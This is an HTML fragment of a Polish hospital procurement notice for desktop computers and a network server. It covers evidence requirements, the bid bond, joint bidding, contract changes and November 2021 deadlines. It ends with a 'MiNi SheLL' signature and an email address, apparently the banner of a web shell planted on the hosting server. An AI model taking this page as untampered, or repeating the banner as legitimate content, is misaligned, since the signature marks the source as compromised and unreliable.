dB,<br/>f)	Oświadczenie Wykonawcy, że oferowane modele komputerów posiadają certyfikat Microsoft, potwierdzający poprawną współpracę oferowanych modeli komputerów z systemem operacyjnym Windows Pro 10 64 bit.<br/>g)	Oświadczenie, iż firma serwisująca posiada ISO 9001:2000 na świadczenie usług serwisowych oraz posiadać autoryzację producenta komputera<br/>h)	Deklaracja zgodności (potwierdzająca oznakowanie wyrobu symbolem CE) - oświadczenie producenta lub jego upoważnionego przedstawiciela stwierdzające na jego wyłączną odpowiedzialność, że wyrób jest zgodny z zasadniczymi wymaganiami zawartymi w dyrektywach Nowego Podejścia oraz w normach zharmonizowanych <br/>i)	Certyfikat systemu zarządzania jakością ISO 9001 lub inne zaświadczenie/dokument wydane przez niezależny podmiot zajmujący się poświadczaniem zgodności działań wykonawcy z normami jakościowymi -odpowiadającej normie ISO 9001<br/><br/>II.	PAKIET 2:<br/>a)	Oświadczenie Wykonawcy, że zaoferowane procesory osiągają w teście SPEC CPU2017 Floating Point wynik SPECrate2017_fp_base minimum 189 pkt (wynik osiągnięty dla zainstalowanych dwóch procesorów w oferowanym serwerze). Wynik musi być opublikowany na stronie https://www.spec.org/cpu2017/results/cpu2017.html,<br/>b)	Oświadczenie Wykonawcy lub producenta, że serwer jest fabrycznie nowy oraz pochodzi z oficjalnego kanału dystrybucyjnego w UE.<br/>c)	Oświadczenie Wykonawcy lub producenta potwierdzające, iż elementy z których zbudowane są serwery pochodzą od jednego producenta lub są przez niego certyfikowane oraz całe są objęte gwarancją producenta o wymaganym w specyfikacji poziomie SLA. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> I.	PAKIET 1:<br/>a)	Próbka: w celu sprawdzenia poprawności przeprowadzonych wszystkich wymaganych testów Wykonawca zobowiązany jest dostarczyć oprogramowanie testujące, komputer w zaoferowanej konfiguracji zgodnie z opisem przedmiotu zamówienia (załącznik nr 2 do SWZ) do testu wraz z dokładnym opisem metodyki przeprowadzonego testu wydajności PassMark PerformanceTest 10 i wynikami uprzednio wykonanymi przez Wykonawcę celem sprawdzenia poprawności przeprowadzenia testu. Zamawiający wymaga, aby procesor osiągał w teście wydajności PassMark PerformanceTest 10 wynik dostępny: (https://www.cpubenchmark.net/cpu_list.php) co najmniej wynik 11942 punktów Passmark CPU Mark. Wynik testu procesora z dnia 26.10.2021 r. zawiera załącznik nr 7 do SWZ – „dołączyć do oferty” zgodnie z pkt. 9.1 g) SWZ, <br/>b)	Oświadczenie Wykonawcy, że zaoferowany procesor osiąga w teście wydajności PassMark PerformanceTest 10 wynik dostępny: (https://www.cpubenchmark.net/cpu_list.php) co najmniej wynik 11942 punktów Passmark CPU Mark zgodnie z wynikiem testu procesora z dnia 26.10.2021 r. tj. zgodnie z załącznikiem nr 7 do SWZ,<br/>c)	Karty katalogowe lub inne materiały informacyjne potwierdzające oferowane parametry Monitora opisane w OPZ, które zaoferował Wykonawca,<br/>d)	Oświadczenie Wykonawcy potwierdzające spełnienie kryteriów środowiskowych, w tym zgodności z dyrektywą RoHS Unii Europejskiej o eliminacji substancji niebezpiecznych. Wykonawca sporządza oświadczenie w oparciu o dokumentację producenta stacji roboczej wg wytycznych Krajowej Agencji Poszanowania Energii S.A. [https://www.kape.gov.pl], zawartych w dokumencie „Opracowanie propozycji kryteriów środowiskowych dla produktów zużywających energię możliwych do wykorzystania przy formułowaniu specyfikacji na potrzeby zamówień publicznych”, pkt 3.4.2.1; dokument z grudnia 2006), w szczególności w odniesieniu do zgodności z normą ISO 1043-4 dla płyty głównej oraz elementów wykonanych z tworzyw sztucznych o masie powyżej 25 gram,<br/>e)	Oświadczenie producenta komputera (lub inny dokument producenta komputera) oraz raport badawczy głośności wykonany przez notyfikowane laboratorium/jednostkę potwierdzający, że poziom emitowanego hałasu, mierzony wg normy ISO 7779 i wykazany według normy ISO 9296 w pozycji obserwatora w trybie jałowym (tryb IDLE przy uruchomionym systemie Microsoft Windows) wynosi nie więcej niż 22 dB,<br/>f)	Oświadczenie Wykonawcy, że oferowane modele komputerów posiadają certyfikat Microsoft, potwierdzający poprawną współpracę oferowanych modeli komputerów z systemem operacyjnym Windows Pro 10 64 bit.<br/>g)	Oświadczenie, iż firma serwisująca posiada ISO 9001:2000 na świadczenie usług serwisowych oraz posiadać autoryzację producenta komputera<br/>h)	Deklaracja zgodności (potwierdzająca oznakowanie wyrobu symbolem CE) - oświadczenie producenta lub jego upoważnionego przedstawiciela stwierdzające na jego wyłączną odpowiedzialność, że wyrób jest zgodny z zasadniczymi wymaganiami zawartymi w dyrektywach Nowego Podejścia oraz w normach zharmonizowanych <br/>i)	Certyfikat systemu zarządzania jakością ISO 9001 lub inne zaświadczenie/dokument wydane przez niezależny podmiot zajmujący się poświadczaniem zgodności działań wykonawcy z normami jakościowymi -odpowiadającej normie ISO 9001<br/><br/>II.	PAKIET 2:<br/>a)	Oświadczenie Wykonawcy, że zaoferowane procesory osiągają w teście SPEC CPU2017 Floating Point wynik SPECrate2017_fp_base minimum 189 pkt (wynik osiągnięty dla zainstalowanych dwóch procesorów w oferowanym serwerze). Wynik musi być opublikowany na stronie https://www.spec.org/cpu2017/results/cpu2017.html,<br/>b)	Oświadczenie Wykonawcy lub producenta, że serwer jest fabrycznie nowy oraz pochodzi z oficjalnego kanału dystrybucyjnego w UE.<br/>c)	Oświadczenie Wykonawcy lub producenta potwierdzające, iż elementy z których zbudowane są serwery pochodzą od jednego producenta lub są przez niego certyfikowane oraz całe są objęte gwarancją producenta o wymaganym w specyfikacji poziomie SLA. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> a)	Wypełniony Formularz ofertowy wg załącznika nr 1 do SWZ. Niniejszy Formularz (zał. nr 1 do SWZ) nie podlega uzupełnieniu na zasadach regulowanych przepisami art. 128 ust. 1 UPZP. Wykonawca wypełnia również informacyjnie formularz systemowy (tj. wartości brutto, okres gwarancji, czas dojazdu serwisu gwarancyjnego) na Platformie https://zsm-chorzow.ezamawiajacy.pl/. Wykonawca, składając ofertę informuje Zamawiającego, czy wybór oferty będzie prowadzić do powstania u Zamawiającego obowiązku podatkowego – formularz ofertowy, pkt 2 załącznika nr 1 do SWZ (OPIS SPOSOBU OBLICZANIA CENY pkt 12 ppkt 12.7) SWZ,<br/>b)	Wypełniony i podpisany opis przedmiotu zamówienia zgodnie z załącznikiem nr 2 do SWZ,<br/>c)	Wypełnione i podpisane oświadczenie o braku podstaw wykluczenia i spełnianiu warunków udziału w postępowaniu zgodnie z załącznikiem nr 4 do SWZ,<br/>d)	Dokumenty i oświadczenia wymienione w pkt 5 SWZ przy których umieszczono dopisek: „dołączyć do oferty”,<br/>e)	Pełnomocnictwo lub inne dokumenty, z których wynika prawo do podpisania dokumentów składanych wraz z ofertą – jeżeli dotyczy,<br/>f)	Dowód wniesienia wadium w przypadku wniesienia wadium w formie innej niż pieniężna,<br/>g)	Próbka o której mowa w pkt. 5.13 I a) SWZ. Próbka powinna być złożona na adres: SP ZOZ Zespół Szpitali Miejskich w Chorzowie ul. Strzelców Bytomskich 11, 41-500 Chorzów w Biurze Podawczym z dopiskiem: „Zakup serwera sieciowego i zestawów komputerowych wraz z oprogramowaniem”. Numer postępowania: ZSM/ZP/31/2021 nie otwierać przed 17.11.2021 r. godz. 10:00,<br/>h)	Zobowiązania podmiotów udostępniających zasoby na które wykonawca będzie się powoływał w celu spełniania warunków udziału w postępowaniu – zgodnie z załącznikiem nr 6 do SWZ (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 7.1.	Przystępując do przetargu Wykonawca jest zobowiązany do wniesienia wadium w wysokości uzależnionej od oferowanego pakietu:<br/>Numer i nazwa pakietu	Wadium<br/>Pakiet 1	Zestawy komputerów stacjonarnych z oprogramowaniem	3 080,00 PLN<br/>Pakiet 2	Serwer sieciowy	790,00 PLN<br/>Jeżeli oferta zostanie złożona na wszystkie pakiety, wówczas wadium wyniesie:	3 870,00 PLN <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 4.2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>-Wykonawcy muszą spełniać łącznie warunki określone w pkt. 4 SWZ <br/>-każdy z Wykonawców samodzielnie jest zobowiązany do wykazania braku podstaw do wykluczenia w okolicznościach, o których mowa powyżej.<br/>5.28.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców lub gdy Wykonawca polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby oświadczenie, o którym mowa w pkt. 9.1 c) SWZ składa na wezwanie Zamawiającego Wykonawca/każdy spośród Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>5.29.	W przypadku gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem. Dokument pełnomocnictwa, z treści którego będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia tych Wykonawców należy dołączyć do oferty.<br/>9.5.	Wykonawcy wspólnie składający ofertę zobowiązani są przedłożyć dokument ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo do reprezentowania ich w postępowaniu i do zawarcia umowy w sprawie zamówienia publicznego. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 2.	Zamawiający dopuszcza zmianę umowy w zakresie danych identyfikujących Strony Umowy, takich jak np. firma, adres siedziby lub inne postanowienia dotyczące wskazania stron.<br/>3.	Zamawiający dopuszcza wydłużenie terminu płatności w przypadku zmiany ustawy z dnia 8 marca 2013 r. o przeciwdziałaniu nadmiernym opóźnieniom w transakcjach handlowych (t.j. Dz. U. 2021 poz. 424). <br/>4.	Zmiany postanowień Umowy zostaną wyrażone w formie pisemnego aneksu pod rygorem nieważności i mogą nastąpić w następujących sytuacjach:<br/>1)	w przypadku przerwy w pracach spowodowanej działaniem siły wyższej jako zdarzenia zewnętrznego, niemożliwego do przewidzenia i niemożliwego do zapobieżenia,<br/>2)	zmiany obowiązujących przepisów, jeżeli konieczne będzie dostosowanie treści Umowy do aktualnego stanu prawnego,<br/>4)	zmiany oferowanego przez Wykonawcę sprzętu o ile nowe oprogramowanie posiada parametry i właściwości równoważne lub lepsze niż pierwotnie zaoferowane,<br/>5)	zmiany albo rezygnacji z podwykonawcy będącego podmiotem, na którego zasoby Wykonawca powoływał się, na zasadach określonych w UPZP, w celu wykazania spełniania warunków udziału w postępowaniu,<br/>6)	w przypadku przestojów i przypadków zwłoki z przyczyn leżących po stronie Zamawiającego, mających bezpośredni wpływ na termin wykonania przedmiotu umowy, z zastrzeżeniem, że okres przesunięcia terminu nie może być dłuższy niż okres trwania udokumentowanych przestojów i przypadków zwłoki,<br/>7)	zmiana terminu realizacji Przedmiotu Umowy – w sytuacji opóźnienia realizacji innych zamówień komplementarnych realizowanych w ramach Projektu, co uniemożliwi realizację Umowy zgodnie z pierwotnie określonym terminem lub spowoduje, że realizacja Przedmiotu Umowy w pierwotnie ustalonym terminie będzie nieracjonalna technicznie, organizacyjnie lub finansowo. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-17 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć na Platformie pod adresem: https://zsm-chorzow.ezamawiajacy.pl w zakładce „OFERTY&#34;</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-17 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-16</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com